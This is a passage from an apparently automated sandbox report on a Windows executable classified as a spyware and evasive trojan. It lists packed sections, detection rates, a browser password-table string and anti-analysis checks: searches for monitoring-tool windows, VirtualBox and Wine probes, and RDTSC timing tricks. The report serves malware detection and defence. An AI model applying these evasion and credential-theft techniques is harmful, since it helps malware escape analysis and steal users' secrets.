            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089CDF40_2_0089CDF4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D8D0C0_2_008D8D0C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00876D0B0_2_00876D0B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CCD020_2_008CCD02
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00894D1F0_2_00894D1F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C4DC00_2_007C4DC0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00826D480_2_00826D48
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E6DB20_2_007E6DB2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C0D5C0_2_008C0D5C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00888D5D0_2_00888D5D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BAD900_2_007BAD90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A2D720_2_008A2D72
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00832D7E0_2_00832D7E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00858E870_2_00858E87
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00828E970_2_00828E97
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00862E9E0_2_00862E9E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088AE900_2_0088AE90
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00840E9F0_2_00840E9F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084CEAD0_2_0084CEAD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008ACECB0_2_008ACECB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00820E180_2_00820E18
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B2ED00_2_007B2ED0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00844E420_2_00844E42
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083CE4A0_2_0083CE4A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BEE5C0_2_008BEE5C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00864E590_2_00864E59
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D6E6C0_2_008D6E6C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CAE7F0_2_008CAE7F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C8F870_2_008C8F87
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D8F6C0_2_007D8F6C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085AF9D0_2_0085AF9D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00810FAF0_2_00810FAF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087CFCF0_2_0087CFCF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082CFC80_2_0082CFC8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00892FC30_2_00892FC3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082AF0F0_2_0082AF0F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081EF1A0_2_0081EF1A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CEFE00_2_007CEFE0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B2F280_2_008B2F28
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C4F2B0_2_008C4F2B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BCF210_2_008BCF21
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088EF340_2_0088EF34
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DCF520_2_008DCF52
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C6F8D0_2_007C6F8D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008430860_2_00843086
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008150AB0_2_008150AB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D90400_2_007D9040
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008190D80_2_008190D8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BD0FF0_2_007BD0FF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089700F0_2_0089700F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008230090_2_00823009
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083F00D0_2_0083F00D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083101B0_2_0083101B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BB0270_2_008BB027
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF0CD0_2_007EF0CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D10360_2_008D1036
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009610510_2_00961051
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086D0570_2_0086D057
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E90A00_2_007E90A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085306A0_2_0085306A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008790790_2_00879079
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CD1850_2_008CD185
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084F1940_2_0084F194
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DF1660_2_007DF166
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D91A70_2_008D91A7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089D1A70_2_0089D1A7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CF1BA0_2_008CF1BA
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B91400_2_007B9140
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DF1CC0_2_008DF1CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008951CC0_2_008951CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008451CE0_2_008451CE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008511D10_2_008511D1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00C591A70_2_00C591A7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008611050_2_00861105
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085B10D0_2_0085B10D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081D1110_2_0081D111
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C11E90_2_007C11E9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008771110_2_00877111
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008831130_2_00883113
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008131380_2_00813138
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081B14C0_2_0081B14C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008811450_2_00881145
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF1B00_2_007EF1B0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089B1580_2_0089B158
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085F1650_2_0085F165
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086F1640_2_0086F164
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B917E0_2_008B917E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008652900_2_00865290
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087B29E0_2_0087B29E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DD2940_2_008DD294
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CD2600_2_007CD260
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008492A20_2_008492A2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083D2CC0_2_0083D2CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088D2D60_2_0088D2D6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF2F80_2_007EF2F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BF2180_2_008BF218
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C322D0_2_008C322D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084D22E0_2_0084D22E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A923F0_2_008A923F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008632470_2_00863247
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AF2490_2_008AF249
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008332620_2_00833262
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B12660_2_008B1266
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086B2730_2_0086B273
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086127C0_2_0086127C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008573840_2_00857384
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089739B0_2_0089739B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084B3970_2_0084B397
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DB39B0_2_008DB39B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008993BE0_2_008993BE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF3300_2_007EF330
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081F3E20_2_0081F3E2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E73000_2_007E7300
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087D31B0_2_0087D31B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CD3260_2_008CD326
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E93D00_2_007E93D0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008453320_2_00845332
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B73C00_2_007B73C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF3C00_2_007EF3C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DF34C0_2_008DF34C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008253400_2_00825340
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008113460_2_00811346
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C93550_2_008C9355
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085D4940_2_0085D494
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF4500_2_007EF450
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B94CB0_2_008B94CB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008194C40_2_008194C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008714CF0_2_008714CF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008574F50_2_008574F5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008174110_2_00817411
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008114190_2_00811419
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087941A0_2_0087941A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008694360_2_00869436
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082B4340_2_0082B434
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082D44B0_2_0082D44B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D74A50_2_007D74A5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087745E0_2_0087745E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008954520_2_00895452
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089B46A0_2_0089B46A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082558E0_2_0082558E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C15A70_2_008C15A7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D95A60_2_008D95A6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008515B60_2_008515B6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CF5B30_2_008CF5B3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A35C80_2_008A35C8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C75C70_2_008C75C7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CD5300_2_007CD530
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0097D5C40_2_0097D5C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B55E20_2_008B55E2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E150E0_2_007E150E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081B5FF0_2_0081B5FF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008275100_2_00827510
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008135150_2_00813515
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D35190_2_008D3519
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089F51E0_2_0089F51E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085351C0_2_0085351C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086D51A0_2_0086D51A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C35200_2_008C3520
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009815370_2_00981537
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008555340_2_00855534
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083154F0_2_0083154F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082356D0_2_0082356D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008256980_2_00825698
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B76900_2_008B7690
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008936AE0_2_008936AE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008856A40_2_008856A4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008496BE0_2_008496BE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DD6B70_2_008DD6B7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008276BC0_2_008276BC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D36CE0_2_008D36CE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A96C60_2_008A96C6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082D6FF0_2_0082D6FF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083F6050_2_0083F605
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089D60F0_2_0089D60F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089B6070_2_0089B607
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DB6120_2_008DB612
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082F63D0_2_0082F63D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083D6590_2_0083D659
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BF66E0_2_008BF66E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084B66B0_2_0084B66B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008336770_2_00833677
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009876600_2_00987660
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AF6770_2_008AF677
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008357920_2_00835792
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082579D0_2_0082579D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009917B40_2_009917B4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008997CB0_2_008997CB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008957D10_2_008957D1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087F7DB0_2_0087F7DB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086D7E00_2_0086D7E0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008857F80_2_008857F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008737F00_2_008737F0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008377140_2_00837714
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082971F0_2_0082971F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008617250_2_00861725
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D37D00_2_007D37D0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DF7BC0_2_007DF7BC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082B74A0_2_0082B74A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C975D0_2_008C975D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B97790_2_008B9779
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087D7730_2_0087D773
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AB7700_2_008AB770
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088D8890_2_0088D889
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084188C0_2_0084188C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DB89C0_2_008DB89C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008918970_2_00891897
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: String function: 007B7EE0 appears 44 times
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: String function: 007C4110 appears 83 times
            Source: x6VtGfW26X.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: x6VtGfW26X.exe Static PE information: Section: ZLIB complexity 0.9999421772203947
            Source: x6VtGfW26X.exe Static PE information: Section: yojtimdr ZLIB complexity 0.994666870701256
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: 0_2_007E26E4 CoCreateInstance
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: x6VtGfW26X.exe, 00000000.00000003.1726865836.00000000059A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: x6VtGfW26X.exe Virustotal: Detection: 58%
            Source: x6VtGfW26X.exe ReversingLabs: Detection: 65%
            Source: x6VtGfW26X.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File read: C:\Users\user\Desktop\x6VtGfW26X.exe
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: webio.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Section loaded: version.dll
            Source: x6VtGfW26X.exe Static file information: File size 1883648 > 1048576
            Source: x6VtGfW26X.exe Static PE information: Raw size of yojtimdr is bigger than: 0x100000 < 0x1a2000

            Data Obfuscation

            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Unpacked PE file: 0.2.x6VtGfW26X.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yojtimdr:EW;yoycphiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yojtimdr:EW;yoycphiu:EW;.taggant:EW;
            Source: initial sample Static PE information: section where entry point is pointing to: .taggant
            Source: x6VtGfW26X.exe Static PE information: real checksum: 0x1d8db2 should be: 0x1d745f
            Source: x6VtGfW26X.exe Static PE information: section name:
            Source: x6VtGfW26X.exe Static PE information: section name: .idata
            Source: x6VtGfW26X.exe Static PE information: section name:
            Source: x6VtGfW26X.exe Static PE information: section name: yojtimdr
            Source: x6VtGfW26X.exe Static PE information: section name: yoycphiu
            Source: x6VtGfW26X.exe Static PE information: section name: .taggant
            Source: x6VtGfW26X.exe Static PE information: section name: entropy: 7.982000691785383
            Source: x6VtGfW26X.exe Static PE information: section name: yojtimdr entropy: 7.953909419587561

            Boot Survival

            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Window searched: window name: Filemonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\x6VtGfW26X.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: HKEY_CURRENT_USER\Software\Wine
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C54EF second address: 9C54F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5648 second address: 9C564E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C564E second address: 9C5666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD514h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C597D second address: 9C59BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Ch 0x00000009 jnc 00007FA6C4EBA076h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6C4EBA07Bh 0x00000019 jmp 00007FA6C4EBA087h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5B4E second address: 9C5B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9C5B54 second address: 9C5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FA6C4EBA081h 0x0000000b popad 0x0000000c jo 00007FA6C4EBA07Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
